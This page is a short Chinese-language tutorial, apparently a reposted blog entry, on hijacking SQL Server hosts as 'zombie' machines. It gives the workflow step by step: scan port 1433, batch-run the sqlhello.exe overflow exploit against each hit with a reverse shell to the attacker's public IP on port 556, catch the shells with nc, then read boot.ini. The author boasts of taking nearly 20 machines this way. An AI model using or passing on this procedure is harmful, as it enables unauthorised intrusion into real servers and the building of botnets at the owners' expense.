• 欢迎访问搞代码网站,推荐使用最新版火狐浏览器和Chrome浏览器访问本网站!
  • 如果您觉得本站非常有看点,那么赶紧使用Ctrl+D 收藏搞代码吧

SQL Server溢出猎捕肉鸡新方法_sqlserver

sqlserver 搞代码 3年前 (2018-06-16) 49次浏览 已收录 0个评论

我今天用这个方法拿到了近20台肉鸡。呵!!

  要用到几个工具!!

  nc.exe

  sqlhello.exe

  代理猎手!!

  先用代理猎手扫1433端口!这个大家应该会吧。玩QB的时候可以说是……呵。

  扫到后整理。导出。 替换为溢出的格式!!比如我扫到了。

  192.168.0.1:1433

  溢出的格式就是: sqlhello.exe 192.168.0.1 1433 本机IP(公网的) 556

  保存为bat文件。

  先在公网的机子上监听一个端口 如556

  现在运行那个bat文件!

  呵!!看着有没有shell返回。

  我试过不到两分钟就返回了一个。

  这时候你先ctrl+c 停下那个bat 的运行。

  查看一下。那个shell的系统再说!

  type c:/boot.ini

  如果是2003服务器版的。

  呵。。

  很快的就成为我们的肉鸡了!

欢迎大家阅读《SQL Server溢出猎捕肉鸡新方法_sqlserver,跪求各位点评,若觉得好的话请收藏本文,by 搞代码


喜欢 (0)
[搞代码]
分享 (0)
发表我的评论
取消评论

表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址